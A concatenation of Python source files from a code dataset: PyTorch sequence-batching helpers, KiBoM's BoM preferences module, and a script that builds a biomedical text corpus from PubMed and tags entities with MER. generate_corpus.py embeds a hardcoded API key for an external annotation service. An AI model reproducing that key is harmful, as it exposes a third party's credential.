def batch_sequences(seqs: Sequence[Sequence[T]], extra_seq1: Sequence, *extra_seqs: Sequence, ordered: bool) \
-> Tuple[PackedSequence, Tuple[Sequence, ...]]: ...
def batch_sequences(seqs, *extra_seqs, ordered=False):
r"""
Given a batch from data loader, convert it into PyTorch :class:`PackedSequence`.
Since :class:`PackedSequence` requires sequences to be sorted in reverse order of their length, batch elements are
reordered. If batch contains other data apart from the sequence (e.g. labels), pass them in ``*args`` to allow
consistent reordering.
:param seqs: The sequences.
:param extra_seqs: Other data to be reordered.
:param ordered: If true, assume (and check) that the sequences are already sorted in decreasing length.
"""
indices = sorted(range(len(seqs)), key=lambda idx: len(seqs[idx]), reverse=True)
if ordered and indices != list(range(len(seqs))):
raise ValueError("Sentences are not sorted in decreasing length while specifying `ordered=True`")
tensor_seqs = [torch.tensor(seqs[idx], dtype=torch.long) for idx in indices]
reordered_args = tuple([xs[idx] for idx in indices] for xs in extra_seqs)
packed_seq: PackedSequence = nn.utils.rnn.pack_padded_sequence(
nn.utils.rnn.pad_sequence(tensor_seqs, padding_value=-1), [len(seq) for seq in tensor_seqs])
if len(reordered_args) > 0:
return packed_seq, reordered_args
return packed_seq
def shift_packed_seq(seq: PackedSequence, start: int = 0) -> PackedSequence:
r"""
Shifts the :class:`PackedSequence`, i.e. return the substring starting from ``start``.
:param seq: The sequence to truncate.
:param start: The left endpoint of truncate range. Supports Python indexing syntax (negative for counting
from the end).
:return: Truncated sequence.
"""
data = seq.data
batch_sizes = seq.batch_sizes
return PackedSequence(data[sum(batch_sizes[:start]):], batch_sizes[start:])
def mask_dropout_embeddings(strs: Sequence[Sequence[T]], dropout_prob: float, transposed: bool = False) -> np.ndarray:
r"""
Generate mask for embedding dropout, each word type is either dropped out as a whole
or scaled according to the dropout probability.
:param strs: Un-transposed sentence batch.
:param dropout_prob: Token dropout probability.
:param transposed: Whether to return transposed mask (i.e. batch_size * length)
:return: The generated mask.
"""
words = set([w for s in strs for w in s])
dropout = dict(zip(words, np.random.binomial(1, 1 - dropout_prob, len(words))))
if transposed:
        mask = np.full((len(strs), len(strs[0])), 1 / (1 - dropout_prob), dtype=np.float32)
for i in range(len(strs)):
for j, w in enumerate(strs[i]):
mask[i, j] = dropout[w]
else:
max_len = (max(len(s) for s in strs))
        mask = np.full((max_len, len(strs)), 1 / (1 - dropout_prob), dtype=np.float32)
for idx, s in enumerate(strs):
mask[:len(s), idx] = [dropout[w] for w in s]
# inverse dropout
return mask
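# Hedged usage sketch (not part of the original module; the token ids and labels are
# hypothetical):
#   sents = [[1, 2, 3, 4], [5, 6], [7, 8, 9]]
#   labels = [0, 1, 0]
#   packed, (labels_sorted,) = batch_sequences(sents, labels, ordered=False)
#   # packed is a PackedSequence sorted by decreasing length; labels_sorted is [0, 0, 1].
#   for batch in minibatches_from(list(range(10)), size=4, shuffle=False):
#       print(batch)  # [0, 1, 2, 3], then [4, 5, 6, 7], then [6, 7, 8, 9] (last batch re-padded)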
| 42.204724 | 118 | 0.678545 |
ba43d63725b77c82c530e41f1a378c77b39ed222 | 16,608 | py | Python | kibom/preferences.py | n0dyjeff/KiBoM | 0ce83c2549eb303405c63a1f9538d42ebd75dbb5 | ["MIT"] | null | null | null | kibom/preferences.py | n0dyjeff/KiBoM | 0ce83c2549eb303405c63a1f9538d42ebd75dbb5 | ["MIT"] | null | null | null | kibom/preferences.py | n0dyjeff/KiBoM | 0ce83c2549eb303405c63a1f9538d42ebd75dbb5 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
import re
import os
from .columns import ColumnList
from . import debug
# Check Python version to determine which version of ConfigParser to import
if sys.version_info.major >= 3:
import configparser as ConfigParser
else:
import ConfigParser
class BomPref:
SECTION_IGNORE = "IGNORE_COLUMNS"
SECTION_COLUMN_ORDER = "COLUMN_ORDER"
SECTION_GENERAL = "BOM_OPTIONS"
SECTION_ALIASES = "COMPONENT_ALIASES"
SECTION_GROUPING_FIELDS = "GROUP_FIELDS"
SECTION_REGEXCLUDES = "REGEX_EXCLUDE"
SECTION_REGINCLUDES = "REGEX_INCLUDE"
SECTION_JOIN = "JOIN" # (#81)
OPT_DIGIKEY_LINK = "digikey_link"
OPT_PCB_CONFIG = "pcb_configuration"
OPT_NUMBER_ROWS = "number_rows"
OPT_GROUP_CONN = "group_connectors"
OPT_USE_REGEX = "test_regex"
OPT_USE_ALT = "use_alt"
OPT_MERGE_BLANK = "merge_blank_fields"
OPT_IGNORE_DNF = "ignore_dnf"
OPT_GENERATE_DNF = "html_generate_dnf"
OPT_BACKUP = "make_backup"
OPT_OUTPUT_FILE_NAME = "output_file_name"
OPT_VARIANT_FILE_NAME_FORMAT = "variant_file_name_format"
OPT_DEFAULT_BOARDS = "number_boards"
OPT_DEFAULT_PCBCONFIG = "board_variant"
OPT_CONFIG_FIELD = "fit_field"
OPT_HIDE_HEADERS = "hide_headers"
OPT_HIDE_PCB_INFO = "hide_pcb_info"
OPT_REF_SEPARATOR = "ref_separator"
def __init__(self):
# List of headings to ignore in BoM generation
self.ignore = [
ColumnList.COL_PART_LIB,
ColumnList.COL_FP_LIB,
ColumnList.COL_SHEETPATH,
]
self.corder = ColumnList._COLUMNS_DEFAULT
self.useAlt = False # Use alternate reference representation
self.ignoreDNF = True # Ignore rows for do-not-fit parts
self.generateDNF = True # Generate a list of do-not-fit parts
self.numberRows = True # Add row-numbers to BoM output
self.groupConnectors = True # Group connectors and ignore component value
self.useRegex = True # Test various columns with regex
self.digikey_link = False # Columns to link to Digi-Key
self.boards = 1 # Quantity of boards to be made
self.mergeBlankFields = True # Blanks fields will be merged when possible
self.hideHeaders = False
self.hidePcbInfo = False
self.configField = "Config" # Default field used for part fitting config
self.pcbConfig = ["default"]
self.refSeparator = " "
self.backup = "%O.tmp"
self.separatorCSV = None
self.outputFileName = "%O_bom_%v%V"
self.variantFileNameFormat = "_(%V)"
# Default fields used to group components
self.groups = [
ColumnList.COL_PART,
ColumnList.COL_PART_LIB,
ColumnList.COL_VALUE,
ColumnList.COL_FP,
ColumnList.COL_FP_LIB,
# User can add custom grouping columns in bom.ini
]
self.regIncludes = [] # None by default
self.regExcludes = [
[ColumnList.COL_REFERENCE, '^TP[0-9]*'],
[ColumnList.COL_REFERENCE, '^FID'],
[ColumnList.COL_PART, 'mount.*hole'],
[ColumnList.COL_PART, 'solder.*bridge'],
[ColumnList.COL_PART, 'test.*point'],
[ColumnList.COL_FP, 'test.*point'],
[ColumnList.COL_FP, 'mount.*hole'],
[ColumnList.COL_FP, 'fiducial'],
]
# Default component groupings
self.aliases = [
["c", "c_small", "cap", "capacitor"],
["r", "r_small", "res", "resistor"],
["sw", "switch"],
["l", "l_small", "inductor"],
["zener", "zenersmall"],
["d", "diode", "d_small"]
]
# Nothing to join by default (#81)
self.join = []
# Check an option within the SECTION_GENERAL group
def checkOption(self, parser, opt, default=False):
if parser.has_option(self.SECTION_GENERAL, opt):
return parser.get(self.SECTION_GENERAL, opt).lower() in ["1", "true", "yes"]
else:
return default
def checkInt(self, parser, opt, default=False):
if parser.has_option(self.SECTION_GENERAL, opt):
return int(parser.get(self.SECTION_GENERAL, opt).lower())
else:
return default
def checkStr(self, opt, default=False):
if self.parser.has_option(self.SECTION_GENERAL, opt):
return self.parser.get(self.SECTION_GENERAL, opt)
else:
return default
# Read KiBOM preferences from file
def Read(self, file, verbose=False):
file = os.path.abspath(file)
if not os.path.exists(file) or not os.path.isfile(file):
debug.error("{f} is not a valid file!".format(f=file))
return
cf = ConfigParser.RawConfigParser(allow_no_value=True)
self.parser = cf
cf.optionxform = str
cf.read(file)
# Read general options
if self.SECTION_GENERAL in cf.sections():
self.ignoreDNF = self.checkOption(cf, self.OPT_IGNORE_DNF, default=True)
self.generateDNF = self.checkOption(cf, self.OPT_GENERATE_DNF, default=True)
self.useAlt = self.checkOption(cf, self.OPT_USE_ALT, default=False)
self.numberRows = self.checkOption(cf, self.OPT_NUMBER_ROWS, default=True)
self.groupConnectors = self.checkOption(cf, self.OPT_GROUP_CONN, default=True)
self.useRegex = self.checkOption(cf, self.OPT_USE_REGEX, default=True)
self.mergeBlankFields = self.checkOption(cf, self.OPT_MERGE_BLANK, default=True)
self.outputFileName = self.checkStr(self.OPT_OUTPUT_FILE_NAME, default=self.outputFileName)
self.variantFileNameFormat = self.checkStr(self.OPT_VARIANT_FILE_NAME_FORMAT,
default=self.variantFileNameFormat)
self.refSeparator = self.checkStr(self.OPT_REF_SEPARATOR, default=self.refSeparator).strip("\'\"")
if cf.has_option(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD):
self.configField = cf.get(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD)
if cf.has_option(self.SECTION_GENERAL, self.OPT_DEFAULT_BOARDS):
self.boards = self.checkInt(cf, self.OPT_DEFAULT_BOARDS, default=None)
if cf.has_option(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG):
self.pcbConfig = cf.get(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG).strip().split(",")
if cf.has_option(self.SECTION_GENERAL, self.OPT_BACKUP):
self.backup = cf.get(self.SECTION_GENERAL, self.OPT_BACKUP)
else:
self.backup = False
if cf.has_option(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS):
self.hideHeaders = cf.get(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS) == '1'
if cf.has_option(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO):
self.hidePcbInfo = cf.get(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO) == '1'
if cf.has_option(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK):
self.digikey_link = cf.get(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK)
else:
self.digikey_link = False
        # Read out grouping columns
if self.SECTION_GROUPING_FIELDS in cf.sections():
self.groups = [i for i in cf.options(self.SECTION_GROUPING_FIELDS)]
# Read out ignored-rows
if self.SECTION_IGNORE in cf.sections():
self.ignore = [i for i in cf.options(self.SECTION_IGNORE)]
# Read out column order
if self.SECTION_COLUMN_ORDER in cf.sections():
self.corder = [i for i in cf.options(self.SECTION_COLUMN_ORDER)]
# Read out component aliases
if self.SECTION_ALIASES in cf.sections():
self.aliases = [re.split('[ \t]+', a) for a in cf.options(self.SECTION_ALIASES)]
# Read out join rules (#81)
if self.SECTION_JOIN in cf.sections():
self.join = [a.split('\t') for a in cf.options(self.SECTION_JOIN)]
if self.SECTION_REGEXCLUDES in cf.sections():
self.regExcludes = []
for pair in cf.options(self.SECTION_REGEXCLUDES):
if len(re.split('[ \t]+', pair)) == 2:
self.regExcludes.append(re.split('[ \t]+', pair))
if self.SECTION_REGINCLUDES in cf.sections():
self.regIncludes = []
for pair in cf.options(self.SECTION_REGINCLUDES):
if len(re.split('[ \t]+', pair)) == 2:
self.regIncludes.append(re.split('[ \t]+', pair))
    # Add an option to the SECTION_GENERAL group
def addOption(self, parser, opt, value, comment=None):
if comment:
if not comment.startswith(";"):
comment = "; " + comment
parser.set(self.SECTION_GENERAL, comment)
parser.set(self.SECTION_GENERAL, opt, "1" if value else "0")
# Write KiBOM preferences to file
def Write(self, file):
file = os.path.abspath(file)
cf = ConfigParser.RawConfigParser(allow_no_value=True)
cf.optionxform = str
cf.add_section(self.SECTION_GENERAL)
cf.set(self.SECTION_GENERAL, "; General BoM options here")
self.addOption(cf, self.OPT_IGNORE_DNF, self.ignoreDNF, comment="If '{opt}' option is set to 1, rows that are not to be fitted on the PCB will not be written to the BoM file".format(opt=self.OPT_IGNORE_DNF))
self.addOption(cf, self.OPT_GENERATE_DNF, self.generateDNF, comment="If '{opt}' option is set to 1, also generate a list of components not fitted on the PCB (HTML only)".format(opt=self.OPT_GENERATE_DNF))
self.addOption(cf, self.OPT_USE_ALT, self.useAlt, comment="If '{opt}' option is set to 1, grouped references will be printed in the alternate compressed style eg: R1-R7,R18".format(opt=self.OPT_USE_ALT))
self.addOption(cf, self.OPT_NUMBER_ROWS, self.numberRows, comment="If '{opt}' option is set to 1, each row in the BoM will be prepended with an incrementing row number".format(opt=self.OPT_NUMBER_ROWS))
self.addOption(cf, self.OPT_GROUP_CONN, self.groupConnectors, comment="If '{opt}' option is set to 1, connectors with the same footprints will be grouped together, independent of the name of the connector".format(opt=self.OPT_GROUP_CONN))
self.addOption(cf, self.OPT_USE_REGEX, self.useRegex, comment="If '{opt}' option is set to 1, each component group will be tested against a number of regular-expressions (specified, per column, below). If any matches are found, the row is ignored in the output file".format(opt=self.OPT_USE_REGEX))
self.addOption(cf, self.OPT_MERGE_BLANK, self.mergeBlankFields, comment="If '{opt}' option is set to 1, component groups with blank fields will be merged into the most compatible group, where possible".format(opt=self.OPT_MERGE_BLANK))
cf.set(self.SECTION_GENERAL, "; Specify output file name format, %O is the defined output name, %v is the version, %V is the variant name which will be ammended according to 'variant_file_name_format'.")
cf.set(self.SECTION_GENERAL, self.OPT_OUTPUT_FILE_NAME, self.outputFileName)
cf.set(self.SECTION_GENERAL, "; Specify the variant file name format, this is a unique field as the variant is not always used/specified. When it is unused you will want to strip all of this.")
cf.set(self.SECTION_GENERAL, self.OPT_VARIANT_FILE_NAME_FORMAT, self.variantFileNameFormat)
cf.set(self.SECTION_GENERAL, '; Field name used to determine if a particular part is to be fitted')
cf.set(self.SECTION_GENERAL, self.OPT_CONFIG_FIELD, self.configField)
cf.set(self.SECTION_GENERAL, '; Character used to separate reference designators in output')
cf.set(self.SECTION_GENERAL, self.OPT_REF_SEPARATOR, "'" + self.refSeparator + "'")
cf.set(self.SECTION_GENERAL, '; Make a backup of the bom before generating the new one, using the following template')
cf.set(self.SECTION_GENERAL, self.OPT_BACKUP, self.backup)
cf.set(self.SECTION_GENERAL, '; Default number of boards to produce if none given on CLI with -n')
cf.set(self.SECTION_GENERAL, self.OPT_DEFAULT_BOARDS, self.boards)
cf.set(self.SECTION_GENERAL, '; Default PCB variant if none given on CLI with -r')
cf.set(self.SECTION_GENERAL, self.OPT_DEFAULT_PCBCONFIG, self.pcbConfig)
cf.set(self.SECTION_GENERAL, '; Whether to hide headers from output file')
cf.set(self.SECTION_GENERAL, self.OPT_HIDE_HEADERS, self.hideHeaders)
cf.set(self.SECTION_GENERAL, '; Whether to hide PCB info from output file')
cf.set(self.SECTION_GENERAL, self.OPT_HIDE_PCB_INFO, self.hidePcbInfo)
cf.set(self.SECTION_GENERAL, '; Interpret as a Digikey P/N and link the following field')
cf.set(self.SECTION_GENERAL, self.OPT_DIGIKEY_LINK, self.digikey_link)
cf.add_section(self.SECTION_IGNORE)
cf.set(self.SECTION_IGNORE, "; Any column heading that appears here will be excluded from the Generated BoM")
cf.set(self.SECTION_IGNORE, "; Titles are case-insensitive")
for i in self.ignore:
cf.set(self.SECTION_IGNORE, i)
cf.add_section(self.SECTION_COLUMN_ORDER)
cf.set(self.SECTION_COLUMN_ORDER, "; Columns will apear in the order they are listed here")
cf.set(self.SECTION_COLUMN_ORDER, "; Titles are case-insensitive")
for i in self.corder:
cf.set(self.SECTION_COLUMN_ORDER, i)
# Write the component grouping fields
cf.add_section(self.SECTION_GROUPING_FIELDS)
cf.set(self.SECTION_GROUPING_FIELDS, '; List of fields used for sorting individual components into groups')
cf.set(self.SECTION_GROUPING_FIELDS, '; Components which match (comparing *all* fields) will be grouped together')
cf.set(self.SECTION_GROUPING_FIELDS, '; Field names are case-insensitive')
for i in self.groups:
cf.set(self.SECTION_GROUPING_FIELDS, i)
cf.add_section(self.SECTION_ALIASES)
cf.set(self.SECTION_ALIASES, "; A series of values which are considered to be equivalent for the part name")
cf.set(self.SECTION_ALIASES, "; Each line represents a list of equivalent component name values separated by white space")
cf.set(self.SECTION_ALIASES, "; e.g. 'c c_small cap' will ensure the equivalent capacitor symbols can be grouped together")
cf.set(self.SECTION_ALIASES, '; Aliases are case-insensitive')
for a in self.aliases:
cf.set(self.SECTION_ALIASES, "\t".join(a))
# (#81)
cf.add_section(self.SECTION_JOIN)
cf.set(self.SECTION_JOIN, '; A list of rules to join the content of fields')
cf.set(self.SECTION_JOIN, '; Each line is a rule, the first name is the field that will receive the data')
cf.set(self.SECTION_JOIN, '; from the other fields')
cf.set(self.SECTION_JOIN, '; Use tab (ASCII 9) as separator')
cf.set(self.SECTION_JOIN, '; Field names are case sensitive')
for a in self.join:
cf.set(self.SECTION_JOIN, "\t".join(a))
cf.add_section(self.SECTION_REGINCLUDES)
cf.set(self.SECTION_REGINCLUDES, '; A series of regular expressions used to include parts in the BoM')
cf.set(self.SECTION_REGINCLUDES, '; If there are any regex defined here, only components that match against ANY of them will be included in the BOM')
cf.set(self.SECTION_REGINCLUDES, '; Column names are case-insensitive')
cf.set(self.SECTION_REGINCLUDES, '; Format is: "[ColumName] [Regex]" (white-space separated)')
for i in self.regIncludes:
if not len(i) == 2:
continue
cf.set(self.SECTION_REGINCLUDES, i[0] + "\t" + i[1])
cf.add_section(self.SECTION_REGEXCLUDES)
cf.set(self.SECTION_REGEXCLUDES, '; A series of regular expressions used to exclude parts from the BoM')
cf.set(self.SECTION_REGEXCLUDES, '; If a component matches ANY of these, it will be excluded from the BoM')
cf.set(self.SECTION_REGEXCLUDES, '; Column names are case-insensitive')
cf.set(self.SECTION_REGEXCLUDES, '; Format is: "[ColumName] [Regex]" (white-space separated)')
for i in self.regExcludes:
if not len(i) == 2:
continue
cf.set(self.SECTION_REGEXCLUDES, i[0] + "\t" + i[1])
with open(file, 'w') as configfile:
cf.write(configfile)
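# Hedged usage sketch (not part of the original module; "bom.ini" is a hypothetical
# file name):
#   pref = BomPref()
#   pref.Write("bom.ini")   # write a template config holding the defaults above
#   pref.Read("bom.ini")    # read it back, repopulating the same fields
#   print(pref.boards, pref.configField, pref.outputFileName)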
| 48.703812 | 306 | 0.665041 |
83424c6a0ad0ced45a554cebe6a40be9044a3fd0 | 19,934 | py | Python | generate_corpus.py | lasigeBioTM/ICRel | 1a66d51763d6ced42a798dba07234617f9a25783 | ["MIT"] | 7 | 2017-12-19T22:03:43.000Z | 2019-06-20T09:22:46.000Z | generate_corpus.py | lasigeBioTM/ICRel | 1a66d51763d6ced42a798dba07234617f9a25783 | ["MIT"] | null | null | null | generate_corpus.py | lasigeBioTM/ICRel | 1a66d51763d6ced42a798dba07234617f9a25783 | ["MIT"] | 2 | 2018-04-19T13:52:47.000Z | 2018-09-08T01:47:39.000Z |
import requests
import logging
import xml.etree.ElementTree as ET
import codecs
import os
import sys
import time
import json
import pickle
from time import sleep
import subprocess
import multiprocessing as mp
from sqlalchemy.orm.exc import NoResultFound
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from database_schema import Corpus, Document, Entity, Sentence, Token, Normalization
"""
Generate corpus based on a pubmed query
"""
def parse_pubmed_xml(xml, pmid):
if xml.strip() == '':
print("PMID not found", pmid)
sys.exit()
else:
root = ET.fromstring(xml)
title = root.find('.//ArticleTitle')
if title is not None:
title = title.text
else:
title = ""
abstext = root.findall('.//AbstractText')
if abstext is not None and len(abstext) > 0:
abstext = [a.text for a in abstext]
if all([abst is not None for abst in abstext]):
abstext = '\n'.join(abstext)
else:
abstext = ""
else:
print("Abstract not found:", title, pmid)
print(xml[:50])
abstext = ""
# print xml
# sys.exit()
articleid = root.findall('.//ArticleId')
#for a in articleid:
# if a.get("IdType") == "pmc":
# self.pmcid = a.text[3:]
return title, abstext
def get_pubmed_abs(pmid):
logging.info("gettting {}".format(pmid))
# conn = httplib.HTTPConnection("eutils.ncbi.nlm.nih.gov")
# conn.request("GET", '/entrez/eutils/efetch.fcgi?db=pubmed&id={}&retmode=xml&rettype=xml'.format(pmid))
payload = {"db": "pubmed", "id": pmid, "retmode": "xml", "rettype": "xml"}
try:
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi', payload)
except requests.exceptions.ConnectionError:
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi', payload)
# logging.debug("Request Status: " + str(r.status_code))
response = r.text
# logging.info(response)
title, abstract = parse_pubmed_xml(response.encode("utf8"), pmid)
return title, abstract, str(r.status_code)
def get_pubmed_abstracts(searchterms, corpus_text_path, corpus_name, negative_pmids=[]):
session = get_session()
# searchterms = "+".join([t + "[mesh]" for t in terms])
newcorpus = Corpus(name=corpus_name)
for corpus in session.query(Corpus).filter(Corpus.name == corpus_name):
session.delete(corpus)
query = {"term": "{}+hasabstract[text]".format(searchterms),
#"mindate": "2006",
#"retstart": "7407",
"retmax": "100000",
"sort": "pub+date"} #max 100 000
r = requests.get('http://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi', query)
logging.debug("Request Status: {}".format(str(r.status_code)))
response = r.text
print(r.url)
root = ET.fromstring(response)
pmids = []
repeats = 0
for pmid in root.find("IdList"):
        if pmid.text not in negative_pmids:
pmids.append(pmid.text)
else:
print("repeated pmid: {}".format(pmid))
repeats += 1
print("repeated: {}".format(repeats))
#with codecs.open(corpus_text_path, 'w', 'utf-8') as docfile:
for i, pmid in enumerate(pmids):
#doc = pubmed.PubmedDocument(pmid)
title, abstract, status = get_pubmed_abs(pmid)
# docfile.write(pmid + "\t" + abstract.replace("\n", " ") + '\n')
doc = session.query(Document).filter(Document.pmid == int(pmid)).first()
        if not doc:  # create if it doesn't exist already
doc = Document(pmid=int(pmid), title=title, abstract=abstract)
newcorpus.documents.append(doc)
doc.corpora.append(newcorpus)
print("{}/{}".format(i, len(pmids)))
sleep(0.4)
session.add(newcorpus)
session.commit()
def process_documents(corpus_name, nlp):
session = get_session()
corpus_id = session.query(Corpus).filter(Corpus.name == corpus_name).one().id
docs = session.query(Document).filter(Document.corpora.any(id=corpus_id)).filter(Document.parsed == False).all()
#print(docs)
abstracts = [doc.abstract for doc in docs]
pmids = [doc.pmid for doc in docs]
#docs_generator = nlp.pipe(texts=abstracts, batch_size=10, n_threads=2)
for i, doc in enumerate(docs):
#for i, parsed_doc in enumerate(docs_generator):
print(i, '/', len(abstracts))
#print(doc.pmid, doc.title.encode("utf8"))
parsed_doc = nlp(doc.abstract)
doc = session.query(Document).filter(Document.corpora.any(id=corpus_id)) \
.filter(Document.pmid == pmids[i]).one()
for parsed_sentence in parsed_doc.sents:
sentence = Sentence(offset=parsed_sentence.start_char, order=parsed_sentence.start,
section='A', text=parsed_sentence.text)
doc.sentences.append(sentence)
session.add(sentence)
for word in parsed_sentence:
#print(word.i, word.idx, word.text, word.lemma, word.lemma_, word.tag, word.tag_, word.pos, word.pos_)
token = Token(start=word.idx-parsed_sentence.start_char, end=word.idx+len(word.text)-parsed_sentence.start_char,
order=word.i,
text=word.text, pos=word.tag_, lemma=word.lemma_)
sentence.tokens.append(token)
session.add(token)
doc.parsed = True
session.commit()
#for word in results:
# print(word.text, word.lemma, word.lemma_, word.tag, word.tag_, word.pos, word.pos_)
#session.commit()
def load_gold_relations(reltype):
with codecs.open("seedev_relation.txt", 'r', "utf-8") as f:
gold_relations = f.readlines()
entities = {} # text -> types
relations = {} # type#text -> type#text
for r in gold_relations:
values = r.strip().split("\t")
if values[1] == reltype or reltype == "all":
type1, entity1 = values[0].split("#")
type2, entity2 = values[2].split("#")
if entity1 not in entities:
entities[entity1] = set()
if entity2 not in entities:
entities[entity2] = set()
entities[entity1].add(type1)
entities[entity1].add(type2)
if values[0] not in relations:
relations[values[0]] = set()
relations[values[0]].add((values[2], values[1]))
return entities, relations
def run_mer(text, lexicon, docid="0", docsection="A"):
os.chdir("MER")
#get_entities_args = ["./get_entities.sh", docid, docsection, text, lexicon]
get_entities_args = ["./get_entities.sh", text, lexicon]
#print(get_entities_args)
p = subprocess.Popen(get_entities_args, stdout=subprocess.PIPE)
output, err = p.communicate()
os.chdir("..")
#print(output)
return output.decode()
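# Hedged note (added for clarity, based on how annotate_sentence parses this output):
# each line printed by get_entities.sh is expected to be tab-separated as
#   "<char_start>\t<char_end>\t<matched term>"
# e.g. "0\t8\tcytokine" for a hypothetical match at the start of a sentence.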
def run_mer_externally(text, lexicons):
"""
Call server to run MER using REST api
:param text:
:param lexicons: list of lexicon names
:param docid:
:param docsection:
:return:
"""
base_url = "http://cloud141.ncg.ingrid.pt/IBELight/ibelight.cgi"
params = {"method":"getAnnotations",
"becalm_key": "3deb66a13349fc7889549dfda065a3d8877ac04f",
"text": text,
"types": lexicons}
request = requests.post(base_url, data=json.dumps(params))
return request.text
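# Annotate a single sentence with MER and convert the tab-separated output into
# (char_start, char_end, lexicon, matched_text, sentence_id) tuples.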
def annotate_sentence(sentence_text, sentence_id, lexicon):
#sentence_entities = run_mer_externally(sentence_text, [lexicon])
sentence_entities = run_mer(sentence_text, lexicon)
output = []
if sentence_entities.strip():
for l in sentence_entities.strip().split("\n"):
#print(l)
values = l.split('\t')
char_start, char_end = int(values[0]), int(values[1])
output.append((char_start, char_end, lexicon, values[2], sentence_id))
return output
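# Re-annotate a whole corpus: delete any previous MER entities for each lexicon,
# then run MER on every sentence of every document and store the resulting
# Entity rows (skipping matches whose boundaries do not align with stored tokens).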
def annotate_documents(corpus_name, lexicons=["CHEMICAL", "CELL_LINE_AND_CELL_TYPE", "DISEASE", "PROTEIN", "MIRNA",
"SUBCELLULAR_STRUCTURE", "TISSUE_AND_ORGAN"]):
session = get_session()
corpus = session.query(Corpus).filter(Corpus.name == corpus_name).one()
print("annotating {}...".format(corpus))
#procs = []
#output = mp.Queue()
results = []
for lexicon in lexicons:
for entity in session.query(Entity).filter(Entity.corpus_id == corpus.id)\
.filter(Entity.ner == "mer_" + lexicon):
session.delete(entity)
session.commit()
entities_added = 0
all_docs = session.query(Document).filter(Document.corpora.any(name=corpus_name)).all()
for i, doc in enumerate(all_docs):
#if i < 10000:
# continue
#if i == 100:
# sys.exit()
logging.info("{}/{} {}".format(str(i), str(len(all_docs)), doc.pmid))
for sent in session.query(Sentence).filter(Sentence.document_id == doc.pmid):
for lexicon in lexicons:
#annotate_sentence(sent, lexicon, output)
#p = mp.Process(target=annotate_sentence, args=(sent.text, sent.id, lexicon, output))
#procs.append(p)
#p.start()
#logging.info("annotating sentence with {}...".format(lexicon))
sentence_output = annotate_sentence(sent.text, sent.id, lexicon)
#logging.info(sent.text)
#logging.info(sentence_output)
#logging.info("done")
#results += sentence_output
#results = [output.get() for p in procs]
#for p in procs:
# p.join()
#print("adding entities...")
for entity in sentence_output:
char_start, char_end, lexicon, text, sentence_id = entity
try:
#logging.info("searching for tokens...")
token_start_id = session.query(Token)\
.filter(Token.sentence_id == sentence_id) \
.filter(Token.start == char_start) \
.one().id
token_end_id = session.query(Token)\
.filter(Token.sentence_id == sentence_id) \
.filter(Token.end == char_end) \
.one().id
normalized = text
#logging.info("done")
"""if lexicon == "cytokine":
q = session.query(Normalization).filter(Normalization.text == text) \
.filter(Normalization.entity_type == "cytokine").first()
if q:
normalized = q.reference_name
elif lexicon == "cell":
q = session.query(Normalization).filter(Normalization.text == text) \
.filter(Normalization.entity_type == "cell").first()
if q:
normalized = q.reference_name"""
entity = Entity(start=char_start, end=char_end,
start_token_id=token_start_id,
end_token_id=token_end_id,
text=text, type=lexicon,
normalized=normalized, ner="mer_" + lexicon,
sentence_id=sentence_id, corpus_id=corpus.id)
session.add(entity)
#sent.entities.append(entity)
#corpus.entities.append(entity)
entities_added += 1
except NoResultFound:
logging.info("sent {}: {}".format(sentence_id, sent.text))
logging.info("skipped this entity: {}".format(entity))
#print(sentence_id)
#sentence = session.query(Sentence).filter(Sentence.id == sentence_id).one()
session.commit()
logging.info("added {} entities".format(entities_added))
#session.commit()
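# Attach normalized names to MER entities of the given corpus by looking them up
# in the Normalization table (Entrez for cytokines, Cell Ontology for cells);
# entities without a match keep their surface text.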
def normalize_entities(goldstd, lexicons):
session = get_session()
for l in lexicons:
print(l)
if l == "cytokine":
for entity in session.query(Entity).filter(Entity.ner == "mer_" + l):
if goldstd in [c.name for c in entity.sentence.document.corpora]:
q = session.query(Normalization).filter(Normalization.text == entity.text) \
.filter(Normalization.entity_type == entity.type) \
.filter(Normalization.reference_source == "entrez").first()
if q:
# print(q)
normalized = q.reference_name
entity.normalized = normalized
else:
entity.normalized = entity.text
elif l == "cell":
for entity in session.query(Entity).filter(Entity.ner == "mer_" + l):
if goldstd in [c.name for c in entity.sentence.document.corpora]:
q = session.query(Normalization).filter(Normalization.text == entity.text) \
.filter(Normalization.entity_type == entity.type)\
.filter(Normalization.reference_source == "cellontology").first()
if q:
# print(q)
normalized = q.reference_name
entity.normalized = normalized
else:
entity.normalized = entity.text
session.commit()
def write_annotations_to_file(corpus_name):
pass
def annotate_corpus_relations(corpus, model, corpuspath):
logging.info("getting relations...")
# entities, relations = load_gold_relations(reltype)
logging.info("finding relations...")
# print entities.keys()[:20]
for did in corpus.documents:
for sentence in corpus.documents[did].sentences:
sentences_mirnas = []
sentence_tfs = []
#print sentence.entities.elist
for entity in sentence.entities.elist[model]:
if entity.type == "mirna":
sentences_mirnas.append(entity)
elif entity.type == "protein":
sentence_tfs.append(entity)
#for mirna in sentences_mirnas:
# for tf in sentence_tfs:
# ss = ssm.simui_go(mirna.best_go, tf.best_go)
# if ss > 0:
# print(ss, mirna.text, tf.text, mirna.best_go, tf.best_go)
print("saving corpus...")
corpus.save(corpuspath)
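# Build a SQLAlchemy session for the MySQL "immuno" database using the
# credentials stored in config/database.config.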
def get_session():
with open("config/database.config", 'r') as f:
for l in f:
if l.startswith("username"):
username = l.split("=")[-1].strip()
elif l.startswith("password"):
password = l.split("=")[-1].strip()
#engine = create_engine('sqlite:///database.sqlite', echo=False)
engine = create_engine('mysql+pymysql://{}:{}@localhost/immuno?charset=utf8mb4'.format(username, password), echo=False)
Session = sessionmaker(bind=engine)
#Base = declarative_base()
session = Session()
return session
def main():
